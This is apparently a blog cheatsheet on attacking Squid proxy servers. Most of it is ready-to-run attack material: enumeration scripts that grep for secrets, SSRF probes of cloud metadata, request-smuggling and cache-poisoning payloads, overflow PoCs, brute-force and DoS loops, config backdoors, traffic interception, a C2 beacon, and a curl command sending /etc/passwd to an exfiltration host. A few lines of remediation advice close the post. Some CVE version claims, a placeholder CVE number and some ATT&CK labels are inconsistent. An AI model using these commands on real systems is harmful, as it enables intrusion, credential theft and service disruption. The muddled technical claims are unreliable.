The Ultimate Squid Proxy Penetration Testing Cheatsheet
Updated on December 18, 2025
Table of Contents
- Service Discovery & Reconnaissance
- Fingerprinting Squid Version
- Enumeration Techniques
- Exploitation Vectors
- Web Application Testing Through Proxy
- Critical CVE Exploits
- Denial of Service Exploits
- Tools & Automation
- Post-Exploitation & Persistence
- Lateral Movement
- Defense Evasion
- MITRE ATT&CK Framework Mapping
- Quick Reference Commands
- Remediation Recommendations
- Conclusion
Executive Summary
Squid is a high-performance caching proxy supporting HTTP, HTTPS, FTP, and other protocols. As a critical network infrastructure component, Squid proxies are prime targets for reconnaissance, lateral movement, and data exfiltration. This guide provides Red Team operators and penetration testers with comprehensive attack methodologies, exploitation techniques, and weaponized commands for authorized security assessments.
Service Discovery & Reconnaissance
Port & Service Identification
Default Configuration:
- Default Port: 3128 (TCP)
- Common Alt Ports: 8080, 8888, 3127, 3129
- Protocol Support: HTTP/HTTPS/FTP/Gopher/WAIS
Discovery Commands:
bash
# Nmap service detection
nmap -sV -p 3128,8080,8888 target.com
# Banner grabbing
nc target.com 3128
curl -i -k http://target.com:3128
# Check for open proxy
curl -x http://target.com:3128 http://ifconfig.me -v
curl -x http://target.com:3128 http://google.com -I
# Mass scanning with masscan
masscan -p3128 10.0.0.0/8 --rate=10000MITRE ATT&CK: T1046 (Network Service Discovery)
Fingerprinting Squid Version
Error Page Analysis:
Access the proxy directly without proper request formatting to trigger error pages revealing version information:
bash
# Trigger error page
curl http://target:3128/
# Look for "Server: squid/X.X.X" header
curl -I http://target:3128/
# Test with invalid HTTP method
echo -e "INVALID / HTTP/1.1\r\nHost: target\r\n\r\n" | nc target 3128Cache Manager Version Disclosure:
bash
curl http://target:3128/squid-internal-mgr/info | grep -i "squid cache"MITRE ATT&CK: T1592.002 (Gather Victim Network Information: Software)
Enumeration Techniques
Cache Manager Interface Exploitation
The /squid-internal-mgr/ endpoint is the goldmine for intelligence gathering. /squid-internal-mgr/main is the best way to get the list of all the paths/urls for squid proxy.
High-Value Endpoints:
| Endpoint | Intelligence Value | Data Leaked |
|---|---|---|
| /squid-internal-mgr/info | CRITICAL | Version, uptime, config paths |
| /squid-internal-mgr/config | CRITICAL | Full configuration dump, ACLs, auth methods |
| /squid-internal-mgr/menu | High | Available actions, enabled features |
| /squid-internal-mgr/client_list | High | Active client IPs (pivot targets) |
| /squid-internal-mgr/fqdncache | CRITICAL | Internal DNS cache (network topology) |
| /squid-internal-mgr/ipcache | CRITICAL | IP cache (internal ranges) |
| /squid-internal-mgr/objects | CRITICAL | Cached objects (credentials, tokens) |
| /squid-internal-mgr/username_cache | High | Authenticated usernames |
| /squid-internal-mgr/counters | Medium | Traffic statistics |
| /squid-internal-mgr/http_headers | Medium | Header usage patterns |
Automated Enumeration Script:
bash
#!/bin/bash
TARGET="$1"
PORT="${2:-3128}"
MGMT_ENDPOINTS=(
"info" "config" "menu" "client_list" "fqdncache"
"ipcache" "counters" "username_cache" "objects"
"storedir" "external_acl" "http_headers" "mem"
)
echo "[*] Squid Cache Manager Enumeration: $TARGET:$PORT"
mkdir -p squid_enum_$TARGET
for endpoint in "${MGMT_ENDPOINTS[@]}"; do
echo "[+] Testing: $endpoint"
curl -s "http://$TARGET:$PORT/squid-internal-mgr/$endpoint" \
-o "squid_enum_$TARGET/${endpoint}.txt" 2>/dev/null
if [ -s "squid_enum_$TARGET/${endpoint}.txt" ]; then
echo " [SUCCESS] $(wc -l < squid_enum_$TARGET/${endpoint}.txt) lines"
else
echo " [FAILED] Not accessible"
rm "squid_enum_$TARGET/${endpoint}.txt"
fi
done
# Extract juicy data
echo "[*] Parsing sensitive information..."
grep -i "password\|token\|api\|secret\|key" squid_enum_$TARGET/*.txtMITRE ATT&CK: T1082 (System Information Discovery), T1018 (Remote System Discovery)
Legacy Cache Object Protocol (Squid < 6)
For older versions, use cache_object:// URI scheme:
bash
# Access via curl
curl http://target:3128/cache_object://localhost/info
curl http://target:3128/cache_object://localhost/config
# Using squidclient (if available)
squidclient -h target -p 3128 mgr:info
squidclient -h target -p 3128 mgr:configAuthentication Enumeration
Detecting Auth Type:
bash
# Test for authentication requirement
curl -x http://target:3128 http://google.com -v 2>&1 | grep "407"
# Extract auth realm and method
curl -x http://target:3128 http://google.com -v 2>&1 | grep -i "proxy-authenticate"
# Output: Proxy-Authenticate: Basic realm="Squid proxy-caching web server"Credential File Locations (LFI target):
/etc/squid/passwords/etc/squid3/passwords/etc/squid/squid.conf(may contain commented test creds)/var/log/squid/access.log(leaked credentials in URLs)
Common Default/Weak Credentials:
text
admin:admin
admin:password
proxy:proxy
squid:squid
pxuser:password
test:testExploitation Vectors
SSRF via Open Proxy Misconfiguration
Attack Scenario: Abuse Squid as a pivot to access internal networks or bypass IP restrictions.
Reconnaissance Phase:
bash
# Test for open proxy
curl -x http://target:3128 http://ifconfig.me
# Enumerate internal network ranges
for i in {1..254}; do
curl -x http://target:3128 http://192.168.1.$i --connect-timeout 2 -I
done
# Probe cloud metadata endpoints (AWS)
curl -x http://target:3128 http://169.254.169.254/latest/meta-data/
# Google Cloud metadata
curl -x http://target:3128 http://metadata.google.internal/computeMetadata/v1/Advanced SSRF Chains:
bash
# Access internal admin panels
curl -x http://target:3128 http://localhost:8080/admin
curl -x http://target:3128 http://127.0.0.1:9000/manager/html
# Protocol smuggling (Gopher for SMTP/Redis)
curl -x http://target:3128 gopher://internal-redis:6379/_INFO
# Blind SSRF via timing
time curl -x http://target:3128 http://192.168.1.1:80
time curl -x http://target:3128 http://192.168.1.1:22Port Scanning via Proxy (SPOSE):
bash
# Clone SPOSE - Squid Pivoting Open Port Scanner
git clone https://github.com/aancw/spose
cd spose
# Scan internal target through proxy
python3 spose.py --proxy http://target:3128 --target 192.168.1.10
# Scan multiple targets
for ip in 192.168.1.{1..254}; do
python3 spose.py --proxy http://target:3128 --target $ip
doneProxyChains Integration:
bash
# Configure /etc/proxychains.conf
echo "http target.com 3128" >> /etc/proxychains.conf
# Run tools through proxy
proxychains nmap -sT -Pn 192.168.0.0/24
proxychains sqlmap -u "http://internal-app/vuln.php?id=1"
proxychains msfconsoleMITRE ATT&CK: T1090.002 (Proxy: External Proxy), T1071.001 (Application Layer Protocol: Web Protocols)
Cache Poisoning Attacks
CVE-2016-4554 - HTTP Host Header Smuggling
Squid versions before 3.5.18 (including 3.5.20) are vulnerable to cache poisoning via malformed Host headers.
Attack Mechanism:
text
GET /index.html HTTP/1.1
Host: legitimate-site.com
Host: attacker-controlled.com
Connection: closePoC Exploitation:
bash
# Poison cache with malicious content
curl -x http://target:3128 http://victim.com/index.html \
-H "Host: victim.com" \
-H "Host: attacker.com"
# Verify poisoning
curl -x http://target:3128 http://victim.com/index.htmlImpact: Redirect users to phishing sites, inject malicious JavaScript, compromise downstream caches.
MITRE ATT&CK: T1557.001 (Adversary-in-the-Middle), T1189 (Drive-by Compromise)
HTTP Request Smuggling (CVE-2019-18678)
Inject CRLF sequences to split HTTP requests:
python
import requests
# Craft smuggled request
smuggled = """GET /admin HTTP/1.1
Host: internal-server.local
"""
payload = f"GET /public HTTP/1.1\r\nHost: target.com\r\nContent-Length: {len(smuggled)}\r\n\r\n{smuggled}"
requests.post("http://target:3128", data=payload)Request Smuggling (SQUID-2020:7)
All Squid versions up to 4.11 / 5.0.2 vulnerable to request smuggling and cache poisoning:
bash
# Craft ambiguous Content-Length/Transfer-Encoding
printf "POST / HTTP/1.1\r\nHost: target\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: internal\r\n\r\n" | nc target 3128ACL Bypass & Authentication Evasion
IP Spoofing via Headers:
bash
# Bypass IP-based ACLs
curl -x http://target:3128 http://restricted-site.com \
-H "X-Forwarded-For: 127.0.0.1" \
-H "X-Real-IP: 10.0.0.1" \
-H "Client-IP: 192.168.1.1"HTTP Method Smuggling:
bash
# Test for allowed methods
for method in GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH; do
curl -X $method -x http://target:3128 http://internal-api.local/admin -v
done
# Bypass method restrictions with case manipulation
curl -x http://target:3128 http://target/admin -X "GeT"Cache Manager Password Brute-Force:
bash
# Hydra brute-force
hydra -l '' -P /usr/share/wordlists/rockyou.txt \
target http-get /squid-internal-mgr/info -s 3128
# Custom Python script
for pass in $(cat passwords.txt); do
curl -u ":$pass" http://target:3128/squid-internal-mgr/shutdown -I
doneMITRE ATT&CK: T1550.001 (Use Alternate Authentication Material), T1562.003 (Impair Defenses)
Critical CVE Exploits for Squid Proxy
CVE-2025-62168 - Critical Information Disclosure (CVSS 10.0)
Vulnerability: Squid fails to redact HTTP authentication credentials in error messages, allowing credential harvesting.
Affected Versions: Squid 3.x, 4.x, 5.x, 6.x < 6.4
Exploitation:
bash
# Trigger error with credential leakage
curl -x http://user:password@target:3128 http://nonexistent-domain.invalid -v
# Monitor error responses for leaked credentials
curl http://target:3128/squid-internal-mgr/cache | grep -i "Authorization:"
# Automated credential extraction
while true; do
curl -x http://target:3128 http://trigger-error.local 2>&1 | grep -oP "Authorization: \K.*"
sleep 5
doneImpact: Remote unauthenticated credential disclosure, token harvesting from backend load-balanced applications.
MITRE ATT&CK: T1552.001 (Credentials in Files), T1213 (Data from Information Repositories)
CVE-2025-54574 - URN Response Buffer Overflow (RCE)
Vulnerability: Heap buffer overflow when processing URN responses, enabling RCE or memory disclosure.
Affected Versions: Squid 6.x < 6.4
Exploitation PoC:
python
import socket
target = "target.com"
port = 3128
# Craft URN request triggering overflow
payload = b"GET urn:" + b"A" * 5000 + b" HTTP/1.1\r\n"
payload += b"Host: target\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(payload)
response = s.recv(4096)
print(response)
s.close()Mitigation Bypass: Disable URN access in config:
text
acl URN proto URN
http_access deny URNMITRE ATT&CK: T1203 (Exploitation for Client Execution), T1055 (Process Injection)
CVE-2019-12526 - URN Buffer Overflow (Legacy)
Vulnerability: Heap overflow in URN response handling (Squid 3.0 - 3.5.28, including 3.5.20).
Exploitation:
bash
# Trigger heap corruption
curl -x http://target:3128 "urn:$(python3 -c 'print("A"*10000)')"
# RCE payload (requires ASLR bypass via CVE-2019-18679)
curl -x http://target:3128 "urn:$(cat shellcode.bin | base64)"Chaining: Combine with CVE-2019-18679 for ASLR defeat.
CVE-2019-18679 - HTTP Digest Auth Memory Leak
Vulnerability: Digest authentication leaks heap/stack pointers defeating ASLR.
Exploitation:
bash
# Trigger digest auth to leak addresses
curl -x http://target:3128 http://auth-required-site.com \
--digest --user "attacker:test" -v 2>&1 | grep -i "authenticate"
# Extract leaked memory addresses
curl -x http://target:3128 http://auth-site.com --digest -u "a:a" -v \
| xxd | grep -oP "[0-9a-f]{8,16}"MITRE ATT&CK: T1005 (Data from Local System), T1574 (Hijack Execution Flow)
CVE-2016-4554 - MIME Header Cache Poisoning
Vulnerability: mime_header.cc vulnerability in Squid < 3.5.18.
Exploitation:
bash
# Poison cache for phishing
curl http://target:3128/http://bank.com \
-H "Host: bank.com" \
-H "Host: evil-phishing.com" \
-x http://target:3128
# Inject malicious JavaScript
curl http://target:3128/http://victim.com/app.js \
-H "Host: victim.com" \
-H "Host: attacker.com/malicious.js" \
-x http://target:3128Denial of Service Exploits
Multiple DoS CVEs affect Squid 3.5.20:
- CVE-2007-6239: Causes crashes via malformed requests
- CVE-2024-XXXX: Recent DoS in versions < 6.10
Generic DoS Techniques:
bash
# Connection exhaustion
for i in {1..1000}; do
curl -x http://target:3128 http://google.com &
done
# Malformed request DoS
printf "GET /%s HTTP/1.1\r\nHost: target\r\n\r\n" $(python3 -c "print('A'*100000)") | nc target 3128
# Cache manager shutdown (if password known or not set)
curl http://target:3128/squid-internal-mgr/shutdownMITRE ATT&CK: T1499.002 (Endpoint Denial of Service: Service Exhaustion Flood)
Tools & Automation
Custom Enumeration Script
python
#!/usr/bin/env python3
import requests
import sys
target = sys.argv[1]
port = sys.argv[2] if len(sys.argv) > 2 else "3128"
proxy = f"http://{target}:{port}"
# Test open proxy
try:
r = requests.get("http://ifconfig.me", proxies={"http": proxy}, timeout=5)
print(f"[+] Open Proxy Confirmed! External IP: {r.text.strip()}")
except:
print("[-] Proxy not open or requires auth")
# Enumerate cache manager
mgr_endpoints = ["info", "config", "menu", "client_list", "fqdncache", "ipcache"]
for endpoint in mgr_endpoints:
try:
r = requests.get(f"http://{target}:{port}/squid-internal-mgr/{endpoint}", timeout=3)
if r.status_code == 200:
print(f"[+] {endpoint}: {len(r.text)} bytes retrieved")
with open(f"{endpoint}.txt", "w") as f:
f.write(r.text)
except:
print(f"[-] {endpoint}: Not accessible")
# Test internal network access
internal_ranges = ["127.0.0.1", "192.168.1.1", "10.0.0.1", "172.16.0.1"]
for ip in internal_ranges:
try:
r = requests.get(f"http://{ip}", proxies={"http": proxy}, timeout=2)
print(f"[+] Internal access: {ip} is reachable!")
except:
pass
print("[*] Enumeration complete. Check *.txt files for data.")Post-Exploitation & Persistence
Configuration File Backdooring
Location: /etc/squid/squid.conf or /etc/squid3/squid.conf
Persistence Techniques:
bash
# Add backdoor ACL allowing specific attacker IP
echo "acl attacker src 1.2.3.4" >> /etc/squid/squid.conf
echo "http_access allow attacker" >> /etc/squid/squid.conf
# Disable authentication for backdoor access
echo "acl bypass src 1.2.3.4" >> /etc/squid/squid.conf
echo "http_access allow bypass" >> /etc/squid/squid.conf
# Add cache manager backdoor password
echo "cachemgr_passwd backdoor_pass all" >> /etc/squid/squid.conf
# Reload config
squid -k reconfigureTraffic Interception
Log Harvesting:
bash
# Access logs contain credentials in URLs
tail -f /var/log/squid/access.log | grep -i "password\|token\|api"
# Extract cached credentials
strings /var/spool/squid/cache/* | grep -i "authorization:"Man-in-the-Middle Setup:
bash
# Enable SSL bumping for HTTPS interception
cat >> /etc/squid/squid.conf << EOF
http_port 3128 ssl-bump cert=/etc/squid/cert.pem key=/etc/squid/key.pem
sslcrtd_program /usr/lib/squid/ssl_crtd -s /var/lib/ssl_db -M 4MB
ssl_bump server-first all
EOF
squid -k reconfigureMITRE ATT&CK: T1557.001 (Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay)
Lateral Movement
Pivot Through Compromised Proxy:
bash
# Use as C2 channel
curl -x http://compromised-proxy:3128 http://c2-server.com/beacon
# Route Metasploit through proxy
msf6 > set Proxies http:compromised-proxy:3128
msf6 > set ReverseAllowProxy true
# Exfiltrate data via proxy
curl -x http://compromised-proxy:3128 http://exfil-server.com \
-d @/etc/passwdMITRE ATT&CK: T1090.002 (Proxy: External Proxy), T1041 (Exfiltration Over C2 Channel)
Defense Evasion
Bypassing Detection
Obfuscate Proxy Usage:
bash
# Use HTTPS for proxy connection
curl --proxy-insecure -x https://target:3128 http://internal-host
# Rotate User-Agent
curl -x http://target:3128 http://target-site.com \
-A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Time-based evasion (slow requests)
for i in {1..100}; do
curl -x http://target:3128 http://internal-site.com
sleep 300 # 5 min delay
doneHeader Spoofing:
bash
# Appear as legitimate internal traffic
curl -x http://target:3128 http://sensitive-api.local \
-H "X-Forwarded-For: 10.0.0.50" \
-H "Via: 1.1 internal-proxy.corp"MITRE ATT&CK: T1090.003 (Proxy: Multi-hop Proxy), T1036.005 (Masquerading: Match Legitimate Name or Location)
For a comprehensive overview of persistence mechanisms, please verify our defense evasion strategies.MITRE ATT&CK Framework Mapping
| Technique ID | Technique Name | Application to Squid |
|---|---|---|
| T1046 | Network Service Discovery | Port scanning for Squid instances |
| T1590.002 | Gather Victim Network: Software | Version enumeration via error pages |
| T1082 | System Information Discovery | Cache manager intelligence gathering |
| T1090.002 | Proxy: External Proxy | SSRF via open proxy misconfiguration |
| T1557.001 | Adversary-in-the-Middle | Cache poisoning attacks |
| T1110.001 | Brute Force: Password Guessing | Credential brute-forcing |
| T1552.001 | Credentials in Files | Harvesting /etc/squid/passwords |
| T1213 | Data from Information Repositories | CVE-2025-62168 credential leakage |
| T1203 | Exploitation for Client Execution | CVE-2025-54574 buffer overflow |
| T1499.002 | Endpoint Denial of Service | DoS via malformed requests |
| T1041 | Exfiltration Over C2 Channel | Data exfiltration via proxy |
Quick Reference Commands
bash
# Discovery
nmap -sV -p 3128 target && curl -x http://target:3128 http://ifconfig.me
# Enumeration
curl http://target:3128/squid-internal-mgr/info
curl http://target:3128/squid-internal-mgr/config | grep -i "acl\|auth"
# SSRF Exploitation
curl -x http://target:3128 http://169.254.169.254/latest/meta-data/
for i in {1..254}; do curl -x http://target:3128 http://192.168.1.$i --connect-timeout 1; done
# Port Scanning
python3 spose.py --proxy http://target:3128 --target 192.168.1.10
# Cache Poisoning
curl -x http://target:3128 http://victim.com -H "Host: victim.com" -H "Host: attacker.com"
# Credential Brute-Force
hydra -L users.txt -P pass.txt target http-proxy -s 3128
# Tool Integration
proxychains nmap -sT 192.168.1.0/24
sqlmap -u "http://app?id=1" --proxy http://target:3128
nikto -h internal-web -useproxy http://target:3128
# CVE-2025-62168 Exploitation
curl -x http://user:pass@target:3128 http://invalid.domain -v 2>&1 | grep "Authorization"Remediation Recommendations
For defenders assessing Squid security posture:
- Upgrade immediately: Squid 3.5.20 has critical RCE vulnerabilities; upgrade to 6.4+.
- Restrict cache manager: Set
cachemgr_passwd disable all. - Implement authentication: Use strong passwords, not default credentials.
- ACL hardening: Restrict by IP, deny internal ranges, limit HTTP methods.
- Disable URN: Add
acl URN proto URNandhttp_access deny URN. - Log monitoring: Alert on
/squid-internal-mgr/access and authentication failures. - Version disclosure: Customize error pages to remove version information.
Conclusion
Squid proxy servers present extensive attack surface for Red Team operations, from initial reconnaissance through cache manager enumeration to full network pivot capabilities via SSRF exploitation. The combination of legacy versions (3.5.20 particularly), default configurations, and recent critical CVEs (CVE-2025-62168, CVE-2025-54574) make Squid instances high-value targets. This cheatsheet provides the command-line arsenal necessary for comprehensive authorized security assessments of Squid infrastructure.
Remember: All techniques documented here are for authorized penetration testing only. Unauthorized access to computer systems is illegal.
Enjoyed this guide? Share your thoughts below and tell us how you leverage Squid Proxy Penetration Testing in your projects!
No comments:
Post a Comment